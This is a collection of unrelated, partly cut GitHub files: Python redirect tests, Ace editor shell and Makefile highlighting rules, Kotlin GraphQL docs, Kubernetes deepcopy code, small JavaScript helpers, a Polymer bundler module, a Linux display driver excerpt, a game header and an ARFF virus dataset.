assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", MARIONETTE_URLS, ids=[item["url"] for item in MARIONETTE_URLS]
)
def test_marionette_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize("url", WEBEXT_URLS, ids=[item["url"] for item in WEBEXT_URLS])
def test_webext_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", FIREFOX_ACCOUNTS_URLS, ids=[item["url"] for item in FIREFOX_ACCOUNTS_URLS]
)
def test_firefox_accounts_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
|
{
"pile_set_name": "Github"
}
| null | null |
ace.define("ace/mode/sh_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;
var reservedKeywords = exports.reservedKeywords = (
'!|{|}|case|do|done|elif|else|'+
'esac|fi|for|if|in|then|until|while|'+
'&|;|export|local|read|typeset|unset|'+
'elif|select|set'
);
var languageConstructs = exports.languageConstructs = (
'[|]|alias|bg|bind|break|builtin|'+
'cd|command|compgen|complete|continue|'+
'dirs|disown|echo|enable|eval|exec|'+
'exit|fc|fg|getopts|hash|help|history|'+
'jobs|kill|let|logout|popd|printf|pushd|'+
'pwd|return|set|shift|shopt|source|'+
'suspend|test|times|trap|type|ulimit|'+
'umask|unalias|wait'
);
var ShHighlightRules = function() {
var keywordMapper = this.createKeywordMapper({
"keyword": reservedKeywords,
"support.function.builtin": languageConstructs,
"invalid.deprecated": "debugger"
}, "identifier");
var integer = "(?:(?:[1-9]\\d*)|(?:0))";
var fraction = "(?:\\.\\d+)";
var intPart = "(?:\\d+)";
var pointFloat = "(?:(?:" + intPart + "?" + fraction + ")|(?:" + intPart + "\\.))";
var exponentFloat = "(?:(?:" + pointFloat + "|" + intPart + ")" + ")";
var floatNumber = "(?:" + exponentFloat + "|" + pointFloat + ")";
var fileDescriptor = "(?:&" + intPart + ")";
var variableName = "[a-zA-Z_][a-zA-Z0-9_]*";
var variable = "(?:(?:\\$" + variableName + ")|(?:" + variableName + "=))";
var builtinVariable = "(?:\\$(?:SHLVL|\\$|\\!|\\?))";
var func = "(?:" + variableName + "\\s*\\(\\))";
this.$rules = {
"start" : [{
token : "constant",
regex : /\\./
}, {
token : ["text", "comment"],
regex : /(^|\s)(#.*)$/
}, {
token : "string",
regex : '"',
push : [{
token : "constant.language.escape",
regex : /\\(?:[$abeEfnrtv\\'"]|x[a-fA-F\d]{1,2}|u[a-fA-F\d]{4}([a-fA-F\d]{4})?|c.|\d{1,3})/
}, {
token : "constant",
regex : /\$\w+/
}, {
token : "string",
regex : '"',
next: "pop"
}, {
defaultToken: "string"
}]
}, {
regex : "<<<",
token : "keyword.operator"
}, {
stateName: "heredoc",
regex : "(<<-?)(\\s*)(['\"`]?)([\\w\\-]+)(['\"`]?)",
onMatch : function(value, currentState, stack) {
var next = value[2] == '-' ? "indentedHeredoc" : "heredoc";
var tokens = value.split(this.splitRegex);
stack.push(next, tokens[4]);
return [
{type:"constant", value: tokens[1]},
{type:"text", value: tokens[2]},
{type:"string", value: tokens[3]},
{type:"support.class", value: tokens[4]},
{type:"string", value: tokens[5]}
];
},
rules: {
heredoc: [{
onMatch: function(value, currentState, stack) {
if (value === stack[1]) {
stack.shift();
stack.shift();
this.next = stack[0] || "start";
return "support.class";
}
this.next = "";
return "string";
},
regex: ".*$",
next: "start"
}],
indentedHeredoc: [{
token: "string",
regex: "^\t+"
}, {
onMatch: function(value, currentState, stack) {
if (value === stack[1]) {
stack.shift();
stack.shift();
this.next = stack[0] || "start";
return "support.class";
}
this.next = "";
return "string";
},
regex: ".*$",
next: "start"
}]
}
}, {
regex : "$",
token : "empty",
next : function(currentState, stack) {
if (stack[0] === "heredoc" || stack[0] === "indentedHeredoc")
return stack[0];
return currentState;
}
}, {
token : "variable.language",
regex : builtinVariable
}, {
token : "variable",
regex : variable
}, {
token : "support.function",
regex : func
}, {
token : "support.function",
regex : fileDescriptor
}, {
token : "string", // ' string
start : "'", end : "'"
}, {
token : "constant.numeric", // float
regex : floatNumber
}, {
token : "constant.numeric", // integer
regex : integer + "\\b"
}, {
token : keywordMapper,
regex : "[a-zA-Z_][a-zA-Z0-9_]*\\b"
}, {
token : "keyword.operator",
regex : "\\+|\\-|\\*|\\*\\*|\\/|\\/\\/|~|<|>|<=|=>|=|!="
}, {
token : "paren.lparen",
regex : "[\\[\\(\\{]"
}, {
token : "paren.rparen",
regex : "[\\]\\)\\}]"
} ]
};
this.normalizeRules();
};
oop.inherits(ShHighlightRules, TextHighlightRules);
exports.ShHighlightRules = ShHighlightRules;
});
ace.define("ace/mode/makefile_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules","ace/mode/sh_highlight_rules"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;
var ShHighlightFile = require("./sh_highlight_rules");
var MakefileHighlightRules = function() {
var keywordMapper = this.createKeywordMapper({
"keyword": ShHighlightFile.reservedKeywords,
"support.function.builtin": ShHighlightFile.languageConstructs,
"invalid.deprecated": "debugger"
}, "string");
this.$rules =
{
"start": [
{
token: "string.interpolated.backtick.makefile",
regex: "`",
next: "shell-start"
},
{
token: "punctuation.definition.comment.makefile",
regex: /#(?=.)/,
next: "comment"
},
{
token: [ "keyword.control.makefile"],
regex: "^(?:\\s*\\b)(\\-??include|ifeq|ifneq|ifdef|ifndef|else|endif|vpath|export|unexport|define|endef|override)(?:\\b
|
{
"pile_set_name": "Github"
}
| null | null |
---
id: documenting-fields
title: Documenting Schema
---
Since Javadocs are not available at runtime for introspection, `graphql-kotlin-schema-generator` includes an annotation
class `@GraphQLDescription` that can be used to add schema descriptions to *any* GraphQL schema element. The string value can be in Markdown format.
```kotlin
@GraphQLDescription("A useful widget")
data class Widget(
@GraphQLDescription("The widget's value that can be `null`")
val value: Int?
)
class WidgetQuery {
@GraphQLDescription("Creates new widget for given ID")
fun widgetById(@GraphQLDescription("The special ingredient") id: Int): Widget? = Widget(id)
}
```
The above query would produce the following GraphQL schema:
```graphql
schema {
query: Query
}
type Query {
"""Creates new widget for given ID"""
widgetById(
"""The special ingredient"""
id: Int!
): Widget
}
"""A useful widget"""
type Widget {
"""The widget's value that can be `null`"""
value: Int
}
```
|
{
"pile_set_name": "Github"
}
| null | null |
// +build !ignore_autogenerated
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by deepcopy-gen. DO NOT EDIT.
package v1beta1
import (
runtime "k8s.io/apimachinery/pkg/runtime"
)
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in ExtraValue) DeepCopyInto(out *ExtraValue) {
{
in := &in
*out = make(ExtraValue, len(*in))
copy(*out, *in)
return
}
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ExtraValue.
func (in ExtraValue) DeepCopy() ExtraValue {
if in == nil {
return nil
}
out := new(ExtraValue)
in.DeepCopyInto(out)
return *out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *LocalSubjectAccessReview) DeepCopyInto(out *LocalSubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new LocalSubjectAccessReview.
func (in *LocalSubjectAccessReview) DeepCopy() *LocalSubjectAccessReview {
if in == nil {
return nil
}
out := new(LocalSubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *LocalSubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *NonResourceAttributes) DeepCopyInto(out *NonResourceAttributes) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new NonResourceAttributes.
func (in *NonResourceAttributes) DeepCopy() *NonResourceAttributes {
if in == nil {
return nil
}
out := new(NonResourceAttributes)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *NonResourceRule) DeepCopyInto(out *NonResourceRule) {
*out = *in
if in.Verbs != nil {
in, out := &in.Verbs, &out.Verbs
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.NonResourceURLs != nil {
in, out := &in.NonResourceURLs, &out.NonResourceURLs
*out = make([]string, len(*in))
copy(*out, *in)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new NonResourceRule.
func (in *NonResourceRule) DeepCopy() *NonResourceRule {
if in == nil {
return nil
}
out := new(NonResourceRule)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *ResourceAttributes) DeepCopyInto(out *ResourceAttributes) {
*out = *in
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceAttributes.
func (in *ResourceAttributes) DeepCopy() *ResourceAttributes {
if in == nil {
return nil
}
out := new(ResourceAttributes)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *ResourceRule) DeepCopyInto(out *ResourceRule) {
*out = *in
if in.Verbs != nil {
in, out := &in.Verbs, &out.Verbs
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.APIGroups != nil {
in, out := &in.APIGroups, &out.APIGroups
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.Resources != nil {
in, out := &in.Resources, &out.Resources
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.ResourceNames != nil {
in, out := &in.ResourceNames, &out.ResourceNames
*out = make([]string, len(*in))
copy(*out, *in)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ResourceRule.
func (in *ResourceRule) DeepCopy() *ResourceRule {
if in == nil {
return nil
}
out := new(ResourceRule)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectAccessReview) DeepCopyInto(out *SelfSubjectAccessReview) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
out.Status = in.Status
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectAccessReview.
func (in *SelfSubjectAccessReview) DeepCopy() *SelfSubjectAccessReview {
if in == nil {
return nil
}
out := new(SelfSubjectAccessReview)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *SelfSubjectAccessReview) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *SelfSubjectAccessReviewSpec) DeepCopyInto(out *SelfSubjectAccessReviewSpec) {
*out = *in
if in.ResourceAttributes != nil {
in, out := &in.ResourceAttributes, &out.ResourceAttributes
*out = new(ResourceAttributes)
**out = **in
}
if in.NonResourceAttributes != nil {
in, out := &in.NonResourceAttributes, &out.NonResourceAttributes
*out = new(NonResourceAttributes)
**out = **in
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new SelfSubjectAccessReviewSpec.
func (in *SelfSubjectAccessReviewSpec) DeepCopy() *SelfSubjectAccessReviewSpec {
if in == nil {
return nil
}
out := new(SelfSubjectAccessReviewSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function,
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* Gets the value at `key` of `object`.
*
* @private
* @param {Object} [object] The object to query.
* @param {string} key The key of the property to get.
* @returns {*} Returns the property value.
*/
function getValue(object, key) {
return object == null ? undefined : object[key];
}
export default getValue;
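A quick standalone sketch of `getValue` in use; the function body is copied from the module above so it runs outside the module system:

```javascript
// Mirror of the getValue helper above: safe property access that
// returns undefined for null/undefined objects instead of throwing.
function getValue(object, key) {
  return object == null ? undefined : object[key];
}

console.log(getValue({ width: 100 }, 'width')); // 100
console.log(getValue(null, 'width'));           // undefined
```

Note the `==` comparison intentionally catches both `null` and `undefined` in a single check.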
|
{
"pile_set_name": "Github"
}
| null | null |
Quantum minigolf is nearly the same game as minigolf,
except that the ball obeys the laws of quantum mechanics.
Such a ball can be in several places at once. It can diffract around
obstacles and interfere with itself. Apart from that, the rules are
the same: you can play on various tracks involving various obstacles.
You hit the ball with a club and try to knock it into a hole on the
other side of the track.
WWW: http://quantumminigolf.sourceforge.net
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* @license
* Copyright (c) 2018 The Polymer Project Authors. All rights reserved.
* This code may only be used under the BSD style license found at
* http://polymer.github.io/LICENSE.txt
* The complete set of authors may be found at
* http://polymer.github.io/AUTHORS.txt
* The complete set of contributors may be found at
* http://polymer.github.io/CONTRIBUTORS.txt
* Code distributed by Google as part of the polymer project is also
* subject to an additional IP rights grant found at
* http://polymer.github.io/PATENTS.txt
*/
import generate from 'babel-generator';
import * as babel from 'babel-types';
import {ResolvedUrl} from 'polymer-analyzer';
import {assertIsJsDocument, getAnalysisDocument} from './analyzer-utils';
import {AssignedBundle, BundleManifest} from './bundle-manifest';
import {Bundler} from './bundler';
import {BundledJsDocument} from './document-collection';
import {getModuleExportNames, getOrSetBundleModuleExportName} from './es6-module-utils';
import {Es6Rewriter} from './es6-rewriter';
import {ensureLeadingDot, stripUrlFileSearchAndHash} from './url-utils';
/**
* Produces an ES6 Module BundledDocument.
*/
export async function bundle(
bundler: Bundler, manifest: BundleManifest, url: ResolvedUrl):
Promise<BundledJsDocument> {
const bundle = manifest.bundles.get(url);
if (!bundle) {
throw new Error(`No bundle found in manifest for url ${url}.`);
}
const assignedBundle = {url, bundle};
const generatedCode =
await prepareBundleModule(bundler, manifest, assignedBundle);
const es6Rewriter = new Es6Rewriter(bundler, manifest, assignedBundle);
const {code: rolledUpCode} = await es6Rewriter.rollup(url, generatedCode);
const document = assertIsJsDocument(
await bundler.analyzeContents(assignedBundle.url, rolledUpCode));
return {
language: 'js',
ast: document.parsedDocument.ast,
content: document.parsedDocument.contents,
files: [...assignedBundle.bundle.files]
};
}
/**
* Generate code containing import statements to all bundled modules and
* export statements to re-export their namespaces and exports.
*
* Example: a bundle containing files `module-a.js` and `module-b.js` would
* result in a prepareBundleModule result like:
*
* import * as $moduleA from './module-a.js';
* import * as $moduleB from './module-b.js';
* import $moduleBDefault from './module-b.js';
* export {thing1, thing2} from './module-a.js';
* export {thing3} from './module-b.js';
* export {$moduleA, $moduleB, $moduleBDefault};
*/
async function prepareBundleModule(
bundler: Bundler, manifest: BundleManifest, assignedBundle: AssignedBundle):
Promise<string> {
const bundleSource = babel.program([]);
const sourceAnalysis =
await bundler.analyzer.analyze([...assignedBundle.bundle.files]);
for (const resolvedSourceUrl of [...assignedBundle.bundle.files].sort()) {
const moduleDocument =
getAnalysisDocument(sourceAnalysis, resolvedSourceUrl);
const moduleExports = getModuleExportNames(moduleDocument);
const starExportName =
getOrSetBundleModuleExportName(assignedBundle, resolvedSourceUrl, '*');
bundleSource.body.push(babel.importDeclaration(
[babel.importNamespaceSpecifier(babel.identifier(starExportName))],
babel.stringLiteral(resolvedSourceUrl)));
if (moduleExports.size > 0) {
bundleSource.body.push(babel.exportNamedDeclaration(
undefined, [babel.exportSpecifier(
babel.identifier(starExportName),
babel.identifier(starExportName))]));
bundleSource.body.push(babel.exportNamedDeclaration(
undefined,
[...moduleExports].map(
(e) => babel.exportSpecifier(
babel.identifier(e),
babel.identifier(getOrSetBundleModuleExportName(
assignedBundle, resolvedSourceUrl, e)))),
babel.stringLiteral(resolvedSourceUrl)));
}
}
const {code} = generate(bundleSource);
return code;
}
|
{
"pile_set_name": "Github"
}
| null | null |
// SPDX-License-Identifier: GPL-2.0-only
/*
* Copyright © 2009 Intel Corporation
*/
#include <linux/delay.h>
#include <linux/i2c.h>
#include <linux/pm_runtime.h>
#include <drm/drm_fourcc.h>
#include "framebuffer.h"
#include "gma_display.h"
#include "power.h"
#include "psb_drv.h"
#include "psb_intel_drv.h"
#include "psb_intel_reg.h"
#define MRST_LIMIT_LVDS_100L 0
#define MRST_LIMIT_LVDS_83 1
#define MRST_LIMIT_LVDS_100 2
#define MRST_LIMIT_SDVO 3
#define MRST_DOT_MIN 19750
#define MRST_DOT_MAX 120000
#define MRST_M_MIN_100L 20
#define MRST_M_MIN_100 10
#define MRST_M_MIN_83 12
#define MRST_M_MAX_100L 34
#define MRST_M_MAX_100 17
#define MRST_M_MAX_83 20
#define MRST_P1_MIN 2
#define MRST_P1_MAX_0 7
#define MRST_P1_MAX_1 8
static bool mrst_lvds_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock);
static bool mrst_sdvo_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock);
static const struct gma_limit_t mrst_limits[] = {
{ /* MRST_LIMIT_LVDS_100L */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_100L, .max = MRST_M_MAX_100L},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_1},
.find_pll = mrst_lvds_find_best_pll,
},
	{			 /* MRST_LIMIT_LVDS_83 */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_83, .max = MRST_M_MAX_83},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_0},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_LVDS_100 */
.dot = {.min = MRST_DOT_MIN, .max = MRST_DOT_MAX},
.m = {.min = MRST_M_MIN_100, .max = MRST_M_MAX_100},
.p1 = {.min = MRST_P1_MIN, .max = MRST_P1_MAX_1},
.find_pll = mrst_lvds_find_best_pll,
},
{ /* MRST_LIMIT_SDVO */
.vco = {.min = 1400000, .max = 2800000},
.n = {.min = 3, .max = 7},
.m = {.min = 80, .max = 137},
.p1 = {.min = 1, .max = 2},
.p2 = {.dot_limit = 200000, .p2_slow = 10, .p2_fast = 10},
.find_pll = mrst_sdvo_find_best_pll,
},
};
#define MRST_M_MIN 10
static const u32 oaktrail_m_converts[] = {
0x2B, 0x15, 0x2A, 0x35, 0x1A, 0x0D, 0x26, 0x33, 0x19, 0x2C,
0x36, 0x3B, 0x1D, 0x2E, 0x37, 0x1B, 0x2D, 0x16, 0x0B, 0x25,
0x12, 0x09, 0x24, 0x32, 0x39, 0x1c,
};
static const struct gma_limit_t *mrst_limit(struct drm_crtc *crtc,
int refclk)
{
const struct gma_limit_t *limit = NULL;
struct drm_device *dev = crtc->dev;
struct drm_psb_private *dev_priv = dev->dev_private;
if (gma_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)
|| gma_pipe_has_type(crtc, INTEL_OUTPUT_MIPI)) {
switch (dev_priv->core_freq) {
case 100:
limit = &mrst_limits[MRST_LIMIT_LVDS_100L];
break;
case 166:
limit = &mrst_limits[MRST_LIMIT_LVDS_83];
break;
case 200:
limit = &mrst_limits[MRST_LIMIT_LVDS_100];
break;
}
} else if (gma_pipe_has_type(crtc, INTEL_OUTPUT_SDVO)) {
limit = &mrst_limits[MRST_LIMIT_SDVO];
} else {
limit = NULL;
dev_err(dev->dev, "mrst_limit Wrong display type.\n");
}
return limit;
}
/** Derive the pixel clock for the given refclk and divisors for 8xx chips. */
static void mrst_lvds_clock(int refclk, struct gma_clock_t *clock)
{
clock->dot = (refclk * clock->m) / (14 * clock->p1);
}
static void mrst_print_pll(struct gma_clock_t *clock)
{
DRM_DEBUG_DRIVER("dotclock=%d, m=%d, m1=%d, m2=%d, n=%d, p1=%d, p2=%d\n",
clock->dot, clock->m, clock->m1, clock->m2, clock->n,
clock->p1, clock->p2);
}
static bool mrst_sdvo_find_best_pll(const struct gma_limit_t *limit,
struct drm_crtc *crtc, int target,
int refclk, struct gma_clock_t *best_clock)
{
struct gma_clock_t clock;
u32 target_vco, actual_freq;
s32 freq_error, min_error = 100000;
memset(best_clock, 0, sizeof(*best_clock));
memset(&clock, 0, sizeof(clock));
for (clock.m = limit->m.min; clock.m <= limit->m.max; clock.m++) {
for (clock.n = limit->n.min; clock.n <= limit->n.max;
clock.n++) {
for (clock.p1 = limit->p1.min;
clock.p1 <= limit->p1.max; clock.p1++) {
/* p2 value always stored in p2_slow on SDVO */
clock.p = clock.p1 * limit->p2.p2_slow;
target_vco = target * clock.p;
/* VCO will increase at this point so break */
if (target_vco > limit->vco.max)
break;
if (target_vco < limit->vco.min)
continue;
actual_freq = (refclk * clock.m) /
(clock.n * clock.p);
freq_error = 10000 -
((target * 10000) / actual_freq);
if (freq_error < -min_error)
|
{
"pile_set_name": "Github"
}
| null | null |
/*
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at
* your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* In addition, as a special exception, the author gives permission to
* link the code of this program with the Half-Life Game Engine ("HL
* Engine") and Modified Game Libraries ("MODs") developed by Valve,
* L.L.C ("Valve"). You must obey the GNU General Public License in all
* respects for all of the code used other than the HL Engine and MODs
* from Valve. If you modify this file, you may extend this exception
* to your version of the file, but you are not obligated to do so. If
* you do not wish to do so, delete this exception statement from your
* version.
*
*/
#pragma once
#define DEFINE_DECAL(name)\
{ name, 0 }
enum decal_e
{
DECAL_GUNSHOT1 = 0,
DECAL_GUNSHOT2,
DECAL_GUNSHOT3,
DECAL_GUNSHOT4,
DECAL_GUNSHOT5,
DECAL_LAMBDA1,
DECAL_LAMBDA2,
DECAL_LAMBDA3,
DECAL_LAMBDA4,
DECAL_LAMBDA5,
DECAL_LAMBDA6,
DECAL_SCORCH1,
DECAL_SCORCH2,
DECAL_BLOOD1,
DECAL_BLOOD2,
DECAL_BLOOD3,
DECAL_BLOOD4,
DECAL_BLOOD5,
DECAL_BLOOD6,
DECAL_YBLOOD1,
DECAL_YBLOOD2,
DECAL_YBLOOD3,
DECAL_YBLOOD4,
DECAL_YBLOOD5,
DECAL_YBLOOD6,
DECAL_GLASSBREAK1,
DECAL_GLASSBREAK2,
DECAL_GLASSBREAK3,
DECAL_BIGSHOT1,
DECAL_BIGSHOT2,
DECAL_BIGSHOT3,
DECAL_BIGSHOT4,
DECAL_BIGSHOT5,
DECAL_SPIT1,
DECAL_SPIT2,
DECAL_BPROOF1, // Bulletproof glass decal
DECAL_GARGSTOMP1, // Gargantua stomp crack
DECAL_SMALLSCORCH1, // Small scorch mark
DECAL_SMALLSCORCH2, // Small scorch mark
DECAL_SMALLSCORCH3, // Small scorch mark
DECAL_MOMMABIRTH, // Big momma birth splatter
DECAL_MOMMASPLAT,
DECAL_END
};
typedef struct
{
char *name;
int index;
} DLL_DECALLIST;
extern DLL_DECALLIST gDecals[DECAL_END];
|
{
"pile_set_name": "Github"
}
| null | null |
define(function() {
/**
* cssToDOM takes a kebab-case string and converts it to camelCase
* e.g. box-sizing -> boxSizing
*
* @access private
* @function cssToDOM
* @param {string} name - String name of kebab-case prop we want to convert
* @returns {string} The camelCase version of the supplied name
*/
function cssToDOM(name) {
return name.replace(/([a-z])-([a-z])/g, function(str, m1, m2) {
return m1 + m2.toUpperCase();
}).replace(/^-/, '');
}
return cssToDOM;
});
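A standalone sketch of the conversion (the function body is duplicated from the AMD module above so it can run on its own):

```javascript
// kebab-case -> camelCase, as in the cssToDOM module above.
// The regex only joins lowercase-hyphen-lowercase pairs, and a
// leading hyphen (vendor prefixes like -moz-) is stripped last.
function cssToDOM(name) {
  return name.replace(/([a-z])-([a-z])/g, function (str, m1, m2) {
    return m1 + m2.toUpperCase();
  }).replace(/^-/, '');
}

console.log(cssToDOM('box-sizing'));       // boxSizing
console.log(cssToDOM('-moz-user-select')); // mozUserSelect
```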
|
{
"pile_set_name": "Github"
}
| null | null |
% Datasets for `Pattern Recognition and Neural Networks' by B.D. Ripley
% =====================================================================
%
% Cambridge University Press (1996) ISBN 0-521-46086-7
%
% The background to the datasets is described in section 1.4; this file
% relates the computer-readable files to that description.
%
%
%
% Cushing's syndrome
% ------------------
%
% Data from Aitchison & Dunsmore (1975, Tables 11.1-3).
%
% Data file Cushings.dat has four columns,
%
% Label of the patient
%	Tetrahydrocortisone (mg/24hr)
% Pregnanetriol (mg/24hr)
% Type
%
% The type of the last six patients (u1 to u6) should be
% regarded as unknown. (The code `o' indicates `other').
%
%
%
% synthetic two-class problem
% ---------------------------
%
% Data from Ripley (1994a).
%
% This has two real-valued co-ordinates (xs and ys) and a class (xc)
% which is 0 or 1.
%
% Data file synth.tr has 250 rows of the training set
% synth.te has 1000 rows of the test set (not used here)
%
%
%
% viruses
% -------
%
% This is a dataset on 61 viruses with rod-shaped particles affecting
% various crops (tobacco, tomato, cucumber and others) described by
% Fauquet et al. (1988) and analysed by Eslava-Gómez (1989). There
% are 18 measurements on each virus, the number of amino acid residues
% per molecule of coat protein.
%
% Data file viruses.dat has 61 rows of 18 counts
% virus3.dat has 38 rows corresponding to the distinct
% Tobamoviruses.
%
% The whole dataset is in order Hordeviruses (3), Tobraviruses (6),
% Tobamoviruses (39) and `furoviruses' (13).
%
%
%
% Leptograpsus crabs
% ------------------
%
% Data from Campbell & Mahon (1974) on the morphology of rock crabs of
% genus Leptograpsus.
%
% There are 50 specimens of each sex of each of two colour forms.
%
% Data file crabs.dat has rows
%
% sp `species', coded B (blue form) or O (orange form)
% sex coded M or F
% index within each group of 50
% FL frontal lip of carapace (mm)
% RW rear width of carapace (mm)
% CL length along the midline of carapace (mm)
% CW maximum width of carapace (mm)
% BD body depth (mm)
%
%
%
% Forensic glass
% --------------
%
% This example comes from forensic testing of glass collected by
% B. German on 214 fragments of glass. It is also contained in the
% UCI machine-learning database collection (Murphy & Aha, 1995).
%
% Data file fglass.dat has 214 rows with data for a single glass
% fragment.
%
% RI refractive index
% Na % weight of sodium oxide(s)
% Mg % weight of magnesium oxide(s)
% Al % weight of aluminium oxide(s)
% Si % weight of silicon oxide(s)
% K % weight of potassium oxide(s)
% Ca % weight of calcium oxide(s)
% Ba % weight of barium oxide(s)
% Fe % weight of iron oxide(s)
% type coded 1 to 7
%
% The type codes are:
%
% 1 (WinF) window float glass
% 2 (WinNF) window non-float glass
% 3 (Veh) vehicle glass
% 5 (Con) containers
% 6 (Tabl) tableware
% 7 (Head) vehicle headlamp glass
%
% The ten groups used for the cross-validation experiments (I believe)
% are listed as row numbers in the file fglass.grp.
%
%
%
% Diabetes in Pima Indians
% ------------------------
%
% A population of women who were at least 21 years old, of Pima Indian heritage
% and living near Phoenix, Arizona, was tested for diabetes
% according to World Health Organization criteria. The data
% were collected by the US National Institute of Diabetes and Digestive and
% Kidney Diseases (Smith et al, 1988). This example is also contained in the
% UCI machine-learning database collection (Murphy & Aha, 1995).
%
% The data files have rows containing
%
% npreg number of pregnancies
% glu plasma glucose concentration in an oral glucose tolerance test
% bp diastolic blood pressure (mm Hg)
% skin triceps skin fold thickness (mm)
% ins serum insulin (micro U/ml)
% bmi body mass index (weight in kg/(height in m)^2)
% ped diabetes pedigree function
% age in years
% type No / Yes
%
% Data file pima.tr has 200 rows of complete training data.
% pima.te has 332 rows of complete test data.
% pima.tr2 has the 200 rows of pima.tr plus 100 incomplete rows.
%
%
% Note: there was no column information in the data, hence the names
% were generated automatically
%
%
% Information about the dataset
% CLASSTYPE: nominal
% CLASSINDEX: none specific
%
@relation prnn-viruses
@attribute col_1 INTEGER
@attribute col_2 INTEGER
@attribute col_3 INTEGER
@attribute col_4 INTEGER
@attribute col_5 INTEGER
@attribute col_6 INTEGER
@attribute col_7 INTEGER
@attribute col_8 {0,1,2,3}
@attribute col_9 INTEGER
@attribute col_10 {0,1,2,3,4,7}
@attribute col_11 {3,4,5,6,7,8,9,10,11}
@attribute col_12 {11,12,13,14,15,16,17,18,19,21}
@attribute col_13 {4,5,6,7,8,9,12,15}
@attribute col_14 {4,5,6,7,8,9,10,11,12,14}
@attribute col_15 {0,1,2,3,4,5,6}
@attribute col_16 INTEGER
@attribute col_17 INTEGER
@attribute col_18 {0,1,2,3,4,5}
@data
25,9,9,19,12,8,20,0,10,0,6,21,8,7,4,7,17,5
26,9,9,20,13,8,20,0,10,0,6,21,8,7,4,7,17,5
25,9,9,22,10,10,23,0,13,0,6,19,5,6,4,8,16,5
